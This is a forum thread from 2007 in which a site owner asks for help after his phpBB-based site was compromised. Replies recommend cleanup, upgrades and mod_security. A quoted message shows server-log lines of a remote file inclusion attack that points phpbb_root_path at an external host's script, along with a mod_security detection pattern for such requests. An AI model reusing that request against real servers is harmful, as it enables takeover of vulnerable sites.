help! all1count web trojan / downloader

[lobos]

My site is infected with this - www.themes.co.nz - i have been told it's not too nasty, but I just can't find where it is! The warning comes up even if I disable Javascript... can some one help me please!

I have even tried a find and replace on the the name. but it must be happening before the html/js is output to the browser. It's got me stumped

TIA

-lobos

[Vin DSL]

You're talking about this, right?

What are you waiting for? Get over to here and buy em' cause' the time grows short (who know's when Lobos could regain his sanity).

[Vin DSL]

Um... you're NOT actually insane, right? Like seeing things?!?!?

I'm confused! I don't see anything wrong...

Can you explain the situation a little further?

[lobos]

Sorry Vin, hahahahahaha I just reread that post (i had to duck out before proofing it properly and I just posted), and I can see where you could have got confused...

What I meant to do was connect the title of the OP to the info (did you read the title?)... but anyway I am having trouble with the all1count web trojan / downloader everytime I visit a page on themes.co.nz I get a big read apple of a warning from Nod...

I have ran a find and replace on the actual data output to the browser as I though there was some js code injected somewhere, but it's not - it is coming from somewhere else... I disabled JS and it still runs... it's got me effed where the thing is coming from...

Any advice or help you could give me would be very much appreciated thank you.

-Lobos

[lobos]

Well it seems I am effed My friend just sent me this:

Comments: I sent you a PM at Carls forums, but not
sure if it made it thru. So I'll send this to you
here as well.


--------------------------

Hi there,

Visited pn today and saw the news about the phpbb
exploit then saw your posts...

I looked at my log and found this:

212.110.128.68 - - [02/Aug/2007:21:27:01 -0400]
"GET
/index.php?name=PNphpBB2&file=viewtopic&p =254/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?
HTTP/1.1" 200 47287 "-" "libwww-perl/5.803"
212.110.128.68 - - [02/Aug/2007:21:27:03 -0400]
"GET
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?
HTTP/1.1" 200 5 "-" "libwww-perl/5.803"

If you go to:
http://usuarios.arnet.com.ar/larry123/safe.txt

YOu will see some kind of code....

Hmmmmm...

Anyway do you have any experience with this type
of thing?

Thanks

Matter of fact I do. Most all server admins do.
And thats why many are now banning the use of
any form of phpbb on thier servers. Myself
included.

That script in your logs, and MANY others like it,
give access to your server. Once they are in, all
hope is lost. Time for a reload of the server, not
just the site.

Want to stay safe-er? Install mod security on your
server with a very strict ruleset, or move to a
host who has protections in place to help fend off
these attacks, for you.

Or better yet, give up on phpbb all together and
convert out of it.

http://www.simplemachines.org/download/?converters

Hard for me to believe you would even still use
it, I read your posts and felt compelled to send
you a message.

2.6 million hits on google.
http://www.google.com/search?hl=en&q=phpbb+hacked

Doesn't take a brain surgeon to see the writing on
the wall bud.

This below, is what your log should look like. As
you know I used to run phpbb myself, YEARS ago. I
do not have any phpbb scripts on any of my
servers.

The attacks STILL come, often.

[Tue Jul 31 13:29:20 2007] [error] [client
195.242.211.140] mod_security: Access denied with
code 406. Pattern match
"=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|s h|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x 20?\\\\?"
at REQUEST_URI [id "390144"][rev "1"] [msg
"Rootkit attack: Generic Attempt to install
rootkit"] [severity "CRITICAL"] [hostname
"www.access.siteshostedby.info"] [uri
"/archive/index.php//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]
[Tue Jul 31 13:29:21 2007] [error] [client
195.242.211.140] mod_security: Access denied with
code 406. Pattern match
"=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|s h|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x 20?\\\\?"
at REQUEST_URI [id "390144"][rev "1"] [msg
"Rootkit attack: Generic Attempt to install
rootkit"] [severity "CRITICAL"] [hostname
"www.access.siteshostedby.info"] [uri
"//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http ://usuarios.arnet.com.ar/larry123/safe.txt?"]

Hope that helps some. Best of luck.

So what do I do now?

-Lobos

[Gwaihir]

Sorry to hear you got hacked. First, you should IMHO alert support as to what happened. Your hacked account might right now already be used for all sorts of nasty things.. They'll want to put a stop to that, as well as make sure the server as a whole comes to no harm.

Your friend is right that it is best to restart as cleanly as possible. You could request support to install your account afresh. If you want them to restore from a backup they made (rather than you doing that from your own) there may be a fee though. Then: be sure to upgrade your phpbb (and any other scripts you use) to their latest version right away, even before opening the site to the public.

Some of the other stuff your friend says is big BS though. To my knowledge there hasn't been a serious exploit for phpbb in a long time, so you must be running a very old version.

Or better yet, give up on phpbb all together and
convert out of it.

http://www.simplemachines.org/download/?converters

Hard for me to believe you would even still use
it, I read your posts and felt compelled to send
you a message.

2.6 million hits on google.
http://www.google.com/search?hl=en&q=phpbb+hacked

Doesn't take a brain surgeon to see the writing on
the wall bud.

1.95 million hits on google: http://www.google.nl/search?hl=nl&q=smf+hacked

Seeing as how SMF hasn't been around nearly as long and has a smaller installed base, those numbers - if they mean anything at all - portray it as a good bit worse than phpbb, not better.

The point though, is the same for phpbb, SMF or any other popular script: you need to make sure you keep it up to date. Whenever there's a new version out that fixes security issues, update to it, or you WILL find yourself hacked sooner or later.